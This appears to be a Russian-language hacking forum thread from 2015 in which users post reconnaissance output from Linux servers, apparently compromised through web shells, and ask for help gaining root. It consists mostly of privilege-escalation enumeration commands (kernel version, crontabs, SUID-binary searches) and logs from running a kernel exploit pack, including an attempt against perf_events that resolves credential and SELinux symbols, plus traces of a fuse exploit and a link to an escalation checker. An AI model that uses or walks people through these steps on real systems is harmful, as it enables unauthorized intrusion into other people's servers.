proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sda1 on /boot type ext2 (rw)
/dev/sda4 on /tmp type ext4 (rw,noexec,nosuid,nodev)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda2 2.7T 631G 2.0T 25% /
tmpfs 7.8G 0 7.8G 0% /dev/shm
/dev/sda1 97M 51M 42M 55% /boot
/dev/sda4 2.0G 84M 1.8G 5% /tmp
$ cat /etc/issue
This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.

$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

$ ls -la cron.d,

$ ls -la cron.d

$ ls -la cron.hourly

$ ls -la cron.weekly

$ cat /proc/version
Linux version 2.6.32-358.14.1.el6.x86_64 (mockbuild@c6b10.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) ) #1 SMP Tue Jul 16 23:51:20 UTC 2013
$ cat /proc/sys/vm/mmap_min_addr
4096

$ ls -la /usr/bin/staprun
---s--x--- 1 root stapusr 183072 Oct 15 2014 /usr/bin/staprun
$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rws--x--x 1 root root 14280 May 27 17:00 /usr/libexec/pt_chown
-rwsr-xr-x 1 abrt abrt 10296 Oct 16 2014 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwsr-xr-x 1 root root 257824 Nov 13 2014 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14368 Oct 15 2014 /usr/libexec/polkit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 19768 Dec 20 2014 /usr/local/apache/bin/suexec
-rwsr-xr-x 1 root root 19768 Dec 20 2014 /usr/local/apache.backup/bin/suexec
-rws--x--x 1 root root 20184 Oct 15 2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 66352 Apr 7 11:52 /usr/bin/chage
-rwsr-xr-x 1 root root 82752 Mar 19 2014 /usr/bin/quota
-rwsr-xr-x 1 root root 71480 Apr 7 11:52 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54336 Oct 18 2014 /usr/bin/at
-rwsr-xr-x 1 root root 22544 Oct 15 2014 /usr/bin/pkexec
---s--x--- 1 root stapusr 183072 Oct 15 2014 /usr/bin/staprun
-rwsr-xr-x. 1 root root 30768 Feb 22 2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 36144 Apr 7 11:52 /usr/bin/newgrp
-rwsr-xr-x 1 root root 51784 Nov 23 2013 /usr/bin/crontab

Compiling exp_abacus.c...OK.
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_sieve.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...failed.
Compiling exp_wunderbar.c...OK.
Choose your exploit:
[0] Abacus: Linux 2.6.37 -> 3.8.8 PERF_EVENTS local root
[1] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)
[2] Sieve: Linux 2.6.18+ move_pages() infoleak
[3] Exit
> 0
------------------------------------------------------------------------------
The limits of my language are the limits of my mind. All I know is what I
have words for. --Wittgenstein
------------------------------------------------------------------------------
[+] Resolved set_fs_root to 0xffffffff811b3030 (via System.map)
[+] Resolved set_fs_pwd to 0xffffffff811b2fc0 (via System.map)
[+] Resolved __virt_addr_valid to 0xffffffff8104bc90 (via System.map)
[+] Resolved init_task to 0xffffffff81a8d020 (via System.map)
[+] Resolved init_fs to 0xffffffff81ad4c40 (via System.map)
[+] Resolved default_exec_domain to 0xffffffff81a9a8a0 (via System.map)
[+] Resolved bad_file_ops to 0xffffffff81621300 (via System.map)
[+] Resolved bad_file_aio_read to 0xffffffff8119e9e0 (via System.map)
[+] Resolved ima_audit to 0xffffffff81fd4c7c (via System.map)
[+] Resolved ima_file_mmap to 0xffffffff8123fa00 (via System.map)
[+] Resolved ima_bprm_check to 0xffffffff8123f9c0 (via System.map)
[+] Resolved ima_file_check to 0xffffffff8123f990 (via System.map)
[+] Resolved selinux_enforcing to 0xffffffff81fd04c4 (via System.map)
[+] Resolved selinux_enabled to 0xffffffff81ae2880 (via System.map)
[+] Resolved security_ops to 0xffffffff81fcec58 (via System.map)
[+] Resolved default_security_ops to 0xffffffff81aded00 (via System.map)
[+] Resolved sel_read_enforce to 0xffffffff8122c120 (via System.map)
[+] Resolved audit_enabled to 0xffffffff81ed6ac4 (via System.map)
[+] Resolved commit_creds to 0xffffffff8109e5c0 (via System.map)
[+] Resolved prepare_kernel_cred to 0xffffffff8109e840 (via System.map)
[+] Resolved xen_start_info to 0xffffffff81ddf308 (via System.map)
[+] Resolved ptmx_fops to 0xffffffff81fdda60 (via System.map)
[+] Resolved mark_rodata_ro to 0xffffffff810459f0 (via System.map)
[+] Resolved set_kernel_text_ro to 0xffffffff81045b80 (via System.map)
[+] Resolved make_lowmem_page_readonly to 0xffffffff81005770 (via System.map)
[+] Resolved make_lowmem_page_readwrite to 0xffffffff81005720 (via System.map)
[!] Securely probing with great effort
[-] System rejected creation of perf event. Either this system is patched, or a previous failed exploit was run against it.

slalix

18.07.2015, 13:30

Помогите разобраться с сие машинкой:

.SpoilerTarget" type="button">Spoiler: uname -a

Code:
Linux srv007 2.6.32-5-amd64 #1 SMP Sun Sep 23 10:07:46 UTC 2012 x86_64 GNU/Linux

.SpoilerTarget" type="button">Spoiler: mount

Code:
/dev/sda2 on / type ext3 (rw,noatime,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/sda1 on /boot type ext3 (rw,noatime)
/dev/sda6 on /home type ext3 (rw,nosuid,nodev,noatime,usrquota)
/dev/sda5 on /var type ext3 (rw,noatime)

.SpoilerTarget" type="button">Spoiler: cat /etc/issue

Code:
Debian GNU/Linux 6.0 \n \l

.SpoilerTarget" type="button">Spoiler: cat /etc/crontab

Code:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

.SpoilerTarget" type="button">Spoiler: cat /proc/sys/vm/mmap_min_addr

Code:
65536

.SpoilerTarget" type="button">Spoiler: ls -la /etc/cron.hourly

Code:
total 16
drwxr-xr-x 2 root root 4096 Dec 23 2014 .
drwxr-xr-x 104 root root 4096 Jul 17 12:12 ..
-rw-r--r-- 1 root root 102 Dec 19 2010 .placeholder
-rwx------ 1 root root 317 Dec 23 2014 nginx-log-rotate

.SpoilerTarget" type="button">Spoiler: ls -la /etc/cron.monthly

Code:
total 20
drwxr-xr-x 2 root root 4096 Nov 14 2011 .
drwxr-xr-x 104 root root 4096 Jul 17 12:12 ..
-rw-r--r-- 1 root root 102 Dec 19 2010 .placeholder
-rwxr-xr-x 1 root root 1281 Sep 28 2010 acct
-rwx------ 1 root root 270 Mar 1 2011 rm_old_cronjobs.sh

.SpoilerTarget" type="button">Spoiler: ls -la /etc/cron.monthly

Code:
total 24
drwxr-xr-x 2 root root 4096 Nov 14 2011 .
drwxr-xr-x 104 root root 4096 Jul 17 12:12 ..
-rw-r--r-- 1 root root 102 Dec 19 2010 .placeholder
-rwxr-xr-x 1 root root 895 Jan 3 2011 man-db
-rwxr-xr-x 1 root root 1784 Apr 6 2010 rkhunter
-rwxr-xr-x 1 root root 1133 Sep 10 2010 sysklogd

GCC присутствует, но права на него отсутствуют

Пробовал использовать enlightenment из шапки, результат вот:

.SpoilerTarget" type="button">Spoiler: ./run_null_exploits.sh

Code:
Compiling exp_abacus.c...OK.
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_sieve.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...OK.
Compiling exp_wunderbar.c...OK.
./run_null_exploits.sh: line 61: /usr/bin/gcc: Permission denied
./run_null_exploits.sh: line 63: ./pwnkernel: No such file or directory

grimnir

21.07.2015, 11:14

$ uname -a
Linux host.com 2.6.22.18-grsec2.1.11-vs2.2.0.6 #2 SMP Thu Jan 15 20:46:37 CET 2009 i686 GNU/Linux
$ ls -la /boot
total 8
drwxr-xr-x 2 root root 4096 Oct 28 2006 .
drwxr-xr-x 22 root root 4096 Feb 23 2012 ..
Spoiler: ls -la --full-time /lib
$ ls -la --full-time /lib
total 4664
drwxr-xr-x 10 root root 12288 2015-02-26 05:18:00.000000000 +0100 .
drwxr-xr-x 22 root root 4096 2012-02-23 16:01:06.000000000 +0100 ..
lrwxrwxrwx 1 root root 21 2009-03-12 17:48:29.000000000 +0100 cpp -> /etc/alternatives/cpp
lrwxrwxrwx 1 root root 14 2009-03-12 17:44:45.000000000 +0100 i386-linux-gnu -> i486-linux-gnu
drwxr-xr-x 2 root root 4096 2009-01-17 12:48:25.000000000 +0100 i486-linux-gnu
drwxr-xr-x 3 root root 4096 2009-03-12 17:41:22.000000000 +0100 init
drwxr-xr-x 2 root root 4096 2009-03-12 17:41:37.000000000 +0100 iptables
-rwxr-xr-x 1 root root 88164 2015-01-29 00:47:04.000000000 +0100 ld-2.3.6.so
lrwxrwxrwx 1 root root 11 2015-02-26 05:18:00.000000000 +0100 ld-linux.so.2 -> ld-2.3.6.so
-rw-r--r-- 1 root root 5448 2015-01-29 00:47:04.000000000 +0100 libBrokenLocale-2.3.6.so
lrwxrwxrwx 1 root root 24 2015-02-26 05:18:00.000000000 +0100 libBrokenLocale.so.1 -> libBrokenLocale-2.3.6.so
-rw-r--r-- 1 root root 13652 2015-01-29 00:47:04.000000000 +0100 libSegFault.so
lrwxrwxrwx 1 root root 15 2009-03-12 17:44:45.000000000 +0100 libacl.so.1 -> libacl.so.1.1.0
-rw-r--r-- 1 root root 22156 2006-07-21 01:40:44.000000000 +0200 libacl.so.1.1.0
-rw-r--r-- 1 root root 9868 2015-01-29 00:47:04.000000000 +0100 libanl-2.3.6.so
lrwxrwxrwx 1 root root 15 2015-02-26 05:18:00.000000000 +0100 libanl.so.1 -> libanl-2.3.6.so
lrwxrwxrwx 1 root root 15 2009-03-12 19:15:27.000000000 +0100 libatm.so.1 -> libatm.so.1.0.0
-rw-r--r-- 1 root root 34768 2005-03-19 03:26:50.000000000 +0100 libatm.so.1.0.0
lrwxrwxrwx 1 root root 16 2009-03-12 17:44:45.000000000 +0100 libattr.so.1 -> libattr.so.1.1.0
-rw-r--r-- 1 root root 12840 2006-03-28 07:25:06.000000000 +0200 libattr.so.1.1.0
lrwxrwxrwx 1 root root 15 2009-03-12 17:44:45.000000000 +0100 libblkid.so.1 -> libblkid.so.1.0
-rw-r--r-- 1 root root 32248 2007-12-06 20:57:51.000000000 +0100 libblkid.so.1.0
lrwxrwxrwx 1 root root 15 2009-03-12 17:44:45.000000000 +0100 libbz2.so.1 -> libbz2.so.1.0.3
lrwxrwxrwx 1 root root 15 2009-03-12 17:44:45.000000000 +0100 libbz2.so.1.0 -> libbz2.so.1.0.3
-rw-r--r-- 1 root root 66200 2006-08-25 19:20:30.000000000 +0200 libbz2.so.1.0.3
-rwxr-xr-x 1 root root 1147548 2015-01-29 00:47:04.000000000 +0100 libc-2.3.6.so
lrwxrwxrwx 1 root root 13 2015-02-26 05:18:00.000000000 +0100 libc.so.6 -> libc-2.3.6.so
lrwxrwxrwx 1 root root 14 2009-03-12 17:44:45.000000000 +0100 libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 2004-04-14 00:10:45.000000000 +0200 libcap.so.1.10
lrwxrwxrwx 1 root root 17 2009-03-12 17:44:45.000000000 +0100 libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10644 2006-09-05 18:26:20.000000000 +0200 libcfont.so.0.0.0
-rw-r--r-- 1 root root 181684 2015-01-29 00:47:04.000000000 +0100 libcidn-2.3.6.so
lrwxrwxrwx 1 root root 16 2015-02-26 05:18:00.000000000 +0100 libcidn.so.1 -> libcidn-2.3.6.so
lrwxrwxrwx 1 root root 17 2009-03-12 17:44:45.000000000 +0100 libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 5820 2007-12-06 20:57:50.000000000 +0100 libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 2009-03-12 17:44:45.000000000 +0100 libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 73540 2006-09-05 18:26:20.000000000 +0200 libconsole.so.0.0.0
-rw-r--r-- 1 root root 21868 2015-01-29 00:47:04.000000000 +0100 libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 17 2015-02-26 05:18:00.000000000 +0100 libcrypt.so.1 -> libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 19 2009-03-12 17:44:45.000000000 +0100 libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 18380 2006-09-05 18:26:20.000000000 +0200 libctutils.so.0.0.0
-rw-r--r-- 1 root root 65332 2006-08-09 00:39:02.000000000 +0200 libdevmapper.so.1.02
-rw-r--r-- 1 root root 9592 2015-01-29 00:47:04.000000000 +0100 libdl-2.3.6.so
lrwxrwxrwx 1 root root 14 2015-02-26 05:18:00.000000000 +0100 libdl.so.2 -> libdl-2.3.6.so
lrwxrwxrwx 1 root root 13 2009-03-12 17:44:45.000000000 +0100 libe2p.so.2 -> libe2p.so.2.3
-rw-r--r-- 1 root root 19132 2007-12-06 20:57:51.000000000 +0100 libe2p.so.2.3
lrwxrwxrwx 1 root root 16 2009-03-12 17:44:45.000000000 +0100 libext2fs.so.2 -> libext2fs.so.2.4
-rw-r--r-- 1 root root 102892 2007-12-06 20:57:51.000000000 +0100 libext2fs.so.2.4
-rw-r--r-- 1 root root 41096 2006-12-10 15:45:12.000000000 +0100 libgcc_s.so.1
lrwxrwxrwx 1 root root 17 2009-03-12 17:44:45.000000000 +0100 libhistory.so.5 -> libhistory.so.5.2
-rw-r--r-- 1 root root 26444 2006-12-19 16:51:33.000000000 +0100 libhistory.so.5.2
-rw-r--r-- 1 root root 141040 2015-01-29 00:47:04.000000000 +0100 libm-2.3.6.so
lrwxrwxrwx 1 root root 13 2015-02-26 05:18:00.000000000 +0100 libm.so.6 -> libm-2.3.6.so
-rw-r--r-- 1 root root 13644 2015-01-29 00:47:04.000000000 +0100 libmemusage.so
lrwxrwxrwx 1 root root 17 2009-03-12 17:44:45.000000000 +0100 libncurses.so.5 -> libncurses.so.5.5
-rw-r--r-- 1 root root 263040 2006-10-19 13:02:31.000000000 +0200 libncurses.so.5.5
lrwxrwxrwx 1 root root 18 2009-03-12 17:44:45.000000000 +0100 libncursesw.so.5 -> libncursesw.so.5.5
-rw-r--r-- 1 root root 308288 2006-10-19 13:02:32.000000000 +0200 libncursesw.so.5.5
-rw-r--r-- 1 root root 72452 2015-01-29 00:47:04.000000000 +0100 libnsl-2.3.6.so
lrwxrwxrwx 1 root root 15 2015-02-26 05:18:00.000000000 +0100 libnsl.so.1 -> libnsl-2.3.6.so
-rw-r--r-- 1 root root 26332 2015-01-29 00:47:04.000000000 +0100 libnss_compat-2.3.6.so
lrwxrwxrwx 1 root root 22 2015-02-26 05:18:00.000000000 +0100 libnss_compat.so.2 -> libnss_compat-2.3.6.so
-rw-r--r-- 1 root root 17840 2015-01-29 00:47:04.000000000 +0100 libnss_dns-2.3.6.so
lrwxrwxrwx 1 root root 19 2015-02-26 05:18:00.000000000 +0100 libnss_dns.so.2 -> libnss_dns-2.3.6.so
-rw-r--r-- 1 root root 34276 2015-01-29 00:47:04.000000000 +0100 libnss_files-2.3.6.so
lrwxrwxrwx 1 root root 21 2015-02-26 05:18:00.000000000 +0100 libnss_files.so.2 -> libnss_files-2.3.6.so
-rw-r--r-- 1 root root 17856 2015-01-29 00:47:04.000000000 +0100 libnss_hesiod-2.3.6.so
lrwxrwxrwx 1 root root 22 2015-02-26 05:18:00.000000000 +0100 libnss_hesiod.so.2 -> libnss_hesiod-2.3.6.so
-rw-r--r-- 1 root root 34320 2015-01-29 00:47:04.000000000 +0100 libnss_nis-2.3.6.so
lrwxrwxrwx 1 root root 19 2015-02-26 05:18:00.000000000 +0100 libnss_nis.so.2 -> libnss_nis-2.3.6.so
-rw-r--r-- 1 root root 38340 2015-01-29 00:47:04.000000000 +0100 libnss_nisplus-2.3.6.so
lrwxrwxrwx 1 root root 23 2015-02-26 05:18:00.000000000 +0100 libnss_nisplus.so.2 -> libnss_nisplus-2.3.6.so
lrwxrwxrwx 1 root root 14 2009-04-10 02:46:34.000000000 +0200 libpam.so.0 -> libpam.so.0.79
-rw-r--r-- 1 root root 29700 2009-03-18 00:58:08.000000000 +0100 libpam.so.0.79
lrwxrwxrwx 1 root root 19 2009-04-10 02:46:34.000000000 +0200 libpam_misc.so.0 -> libpam_misc.so.0.79
-rw-r--r-- 1 root root 8264 2009-03-18 00:58:08.000000000 +0100 libpam_misc.so.0.79
lrwxrwxrwx 1 root root 15 2009-04-10 02:46:34.000000000 +0200 libpamc.so.0 -> libpamc.so.0.79
-rw-r--r-- 1 root root 9660 2009-03-18 00:58:08.000000000 +0100 libpamc.so.0.79
-rw-r--r-- 1 root root 5400 2015-01-29 00:47:04.000000000 +0100 libpcprofile.so
lrwxrwxrwx 1 root root 16 2009-03-12 17:44:45.000000000 +0100 libpopt.so.0 -> libpopt.so.0.0.0
-rw-r--r-- 1 root root 26444 2006-08-08 02:47:49.000000000 +0200 libpopt.so.0.0.0
-rw-r--r-- 1 root root 48256 2006-09-13 03:54:01.000000000 +0200 libproc-3.2.7.so
-rw-r--r-- 1 root root 81701 2015-01-29 00:47:07.000000000 +0100 libpthread-0.10.so
lrwxrwxrwx 1 root root 18 2015-02-26 05:18:00.000000000 +0100 libpthread.so.0 -> libpthread-0.10.so
lrwxrwxrwx 1 root root 18 2009-03-12 17:44:45.000000000 +0100 libreadline.so.5 -> libreadline.so.5.2
-rw-r--r-- 1 root root 188760 2006-12-19 16:51:33.000000000 +0100 libreadline.so.5.2
-rw-r--r-- 1 root root 59172 2015-01-29 00:47:04.000000000 +0100 libresolv-2.3.6.so
lrwxrwxrwx 1 root root 18 2015-02-26 05:18:00.000000000 +0100 libresolv.so.2 -> libresolv-2.3.6.so
-rw-r--r-- 1 root root 30616 2015-01-29 00:47:04.000000000 +0100 librt-2.3.6.so
lrwxrwxrwx 1 root root 14 2015-02-26 05:18:00.000000000 +0100 librt.so.1 -> librt-2.3.6.so
-rw-r--r-- 1 root root 79368 2006-11-05 20:27:33.000000000 +0100 libselinux.so.1
-rw-r--r-- 1 root root 219824 2006-11-15 09:59:54.000000000 +0100 libsepol.so.1
lrwxrwxrwx 1 root root 17 2009-03-12 17:44:45.000000000 +0100 libslang.so.2 -> libslang.so.2.0.6
-rw-r--r-- 1 root root 644012 2006-10-18 21:50:19.000000000 +0200 libslang.so.2.0.6
lrwxrwxrwx 1 root root 12 2009-03-12 17:44:45.000000000 +0100 libss.so.2 -> libss.so.2.0
-rw-r--r-- 1 root root 18520 2007-12-06 20:57:50.000000000 +0100 libss.so.2.0
-rw-r--r-- 1 root root 17860 2015-01-29 00:47:04.000000000 +0100 libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2015-02-26 05:18:00.000000000 +0100 libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2009-03-12 17:44:45.000000000 +0100 libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 28740 2007-02-13 02:05:37.000000000 +0100 libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 9656 2015-01-29 00:47:04.000000000 +0100 libutil-2.3.6.so
lrwxrwxrwx 1 root root 16 2015-02-26 05:18:00.000000000 +0100 libutil.so.1 -> libutil-2.3.6.so
lrwxrwxrwx 1 root root 14 2009-03-12 17:44:45.000000000 +0100 libuuid.so.1 -> libuuid.so.1.2
-rw-r--r-- 1 root root 9128 2007-12-06 20:57:50.000000000 +0100 libuuid.so.1.2
lrwxrwxrwx 1 root root 16 2009-03-12 17:44:45.000000000 +0100 libwrap.so.0 -> libwrap.so.0.7.6
-rw-r--r-- 1 root root 27596 2007-02-25 21:06:02.000000000 +0100 libwrap.so.0.7.6
drwxr-xr-x 2 root root 4096 2009-03-12 17:41:24.000000000 +0100 lsb
drwxr-xr-x 2 root root 4096 2007-02-18 19:30:32.000000000 +0100 modules
drwxr-xr-x 2 root root 4096 2009-04-10 02:46:34.000000000 +0200 security
drwxr-xr-x 15 root root 4096 2006-10-19 13:02:22.000000000 +0200 terminfo
drwxr-xr-x 2 root root 4096 2015-02-26 05:18:00.000000000 +0100 tls
$ mount
/dev/hdv1 on / type ufs (rw,usrquota,grpquota)
none on /proc type proc (defaults)
none on /tmp type tmpfs (size=1000m,mode=1777)
none on /dev/pts type devpts (gid=5,mode=620)
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/hdv1 46G 33G 12G 75% /
none 1000M 292K 1000M 1% /tmp
$ cat /etc/issue
Debian GNU/Linux 4.0 \n \l
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
$ cat /proc/version
Linux version 2.6.22.18-grsec2.1.11-vs2.2.0.6 (root@panther) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #2 SMP Thu Jan 15 20:46:37 CET 2009

1024

21.07.2015, 22:19

Ну, спасайте, господа товарищи олдфаги.

Code:
uname -a :
Linux admin-server 2.6.32-43-generic-pae #97-Ubuntu SMP Wed Sep 5 16:59:17 UTC 2012 i686 GNU/Linux
ls -la /boot :
total 20016
drwxr-xr-x 3 root root 4096 Oct 9 2012 .
drwxr-xr-x 22 root root 4096 Jul 18 15:20 ..
-rw-r--r-- 1 root root 1735360 Sep 6 2012 System.map-2.6.32-43-generic-pae
-rw-r--r-- 1 root root 656323 Sep 6 2012 abi-2.6.32-43-generic-pae
-rw-r--r-- 1 root root 116469 Sep 6 2012 config-2.6.32-43-generic-pae
drwxr-xr-x 3 root root 4096 Oct 8 2012 grub
-rw-r--r-- 1 root root 13612578 Oct 9 2012 initrd.img-2.6.32-43-generic-pae
-rw-r--r-- 1 root root 160280 Mar 23 2010 memtest86+.bin
-rw-r--r-- 1 root root 1200 Sep 6 2012 vmcoreinfo-2.6.32-43-generic-pae
-rw-r--r-- 1 root root 4183264 Sep 6 2012 vmlinuz-2.6.32-43-generic-pae
lls -la --full-time /lib :
(пусто)
mount :
/dev/sda1 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
none on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
none on /dev type devtmpfs (rw,mode=0755)
none on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
none on /dev/shm type tmpfs (rw,nosuid,nodev)
none on /var/run type tmpfs (rw,nosuid,mode=0755)
none on /var/lock type tmpfs (rw,noexec,nosuid,nodev)
none on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
gvfs-fuse-daemon on /home/administrator/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=administrator)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev)
/dev/fuse on /tmp/exploit||/tmp/exploit type fuse (rw,nosuid,nodev,user=www-data)
/dev/fuse on /tmp/_ type fuse (rw,nosuid,nodev,user=www-data)
df -h :
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 231G 18G 202G 8% /
none 1.9G 280K 1.9G 1% /dev
none 1.9G 432K 1.9G 1% /dev/shm
none 1.9G 116K 1.9G 1% /var/run
none 1.9G 0 1.9G 0% /var/lock
none 1.9G 0 1.9G 0% /lib/init/rw
cat /etc/issue :
Ubuntu 10.04.4 LTS \n \l
кронтаб: см.далее
cat /proc/version :
Linux version 2.6.32-43-generic-pae (buildd@roseapple) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5.1) ) #97-Ubuntu SMP Wed Sep 5 16:59:17 UTC 2012
cat /proc/sys/vm/mmap_min_addr :
65536
pwd :
/var/www/login_bak/style ( drwxr----- )
ls -la /usr/bin/staprun :
(пусто)
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null :
-rwsr-xr-x 1 root root 9724 Feb 19 2010 /sbin/mount.ecryptfs_private
-rwsr-xr-- 1 root dip 273312 Mar 7 2010 /usr/sbin/pppd
-rwsr-sr-x 1 libuuid libuuid 13848 Jan 21 2011 /usr/sbin/uuidd
-rwsr-xr-x 1 root root 18056 Apr 20 2011 /usr/bin/pkexec
-rwsr-xr-x 1 root root 127668 Jan 20 2011 /usr/bin/sudo
-rwsr-sr-x 1 root root 9672 Jan 19 2012 /usr/bin/X
-rwsr-xr-x 1 root lpadmin 13540 Sep 12 2011 /usr/bin/lppasswd
-rwsr-xr-x 1 root root 127668 Jan 20 2011 /usr/bin/sudoedit
-rwsr-sr-x 1 daemon daemon 42752 Jan 15 2011 /usr/bin/at
-rwsr-xr-x 1 root root 52092 Mar 7 2010 /usr/bin/mtr
-rwsr-xr-x 1 root root 26356 Feb 2 2010 /usr/bin/fping
-rwsr-xr-x 1 root root 53812 Feb 15 2011 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 13820 Mar 12 2010 /usr/bin/arping
-rwsr-xr-x 1 root root 37140 Feb 15 2011 /usr/bin/passwd
-rwsr-xr-x 1 root root 13952 Mar 12 2010 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 31700 Feb 15 2011 /usr/bin/chsh
-rwsr-xr-x 1 root root 26388 Feb 2 2010 /usr/bin/fping6
-rwsr-xr-x 1 root root 26784 Feb 15 2011 /usr/bin/newgrp
-rwsr-xr-x 1 root root 36180 Feb 15 2011 /usr/bin/chfn
-rwsr-xr-x 1 root root 5548 Nov 10 2009 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 9720 Apr 20 2011 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 9676 Jan 22 2011 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 13780 Apr 18 2010 /usr/lib/chromium-browser/chromium-browser-sandbox
-rwsr-xr-x 1 root root 182464 Jun 17 2011 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 11019 Nov 21 2009 /usr/lib/kde4/libexec/fileshareset
-rwsr-xr-x 1 root root 26456 Mar 12 2010 /bin/ping6
-rwsr-xr-x 1 root root 72188 Jan 21 2011 /bin/mount
-rwsr-xr-x 1 root root 31100 Feb 15 2011 /bin/su
-rwsr-xr-x 1 root root 34756 Mar 12 2010 /bin/ping
-rwsr-xr-x 1 root root 26244 Feb 12 2011 /bin/fusermount
-rwsr-xr-x 1 root root 51224 Jan 21 2011 /bin/umount
-rwsr-xr-- 1 root messagebus 42492 Jul 23 2011 /lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14024 Apr 6 2013 /opt/google/chrome/chrome-sandbox
-rwsr-sr-x 1 root root 3676623 Jan 10 2010 /opt/AutoScan/bin/autoscan-network-daemon

linuxprivchecker.py:

http://my-files.ru/zf4cbx

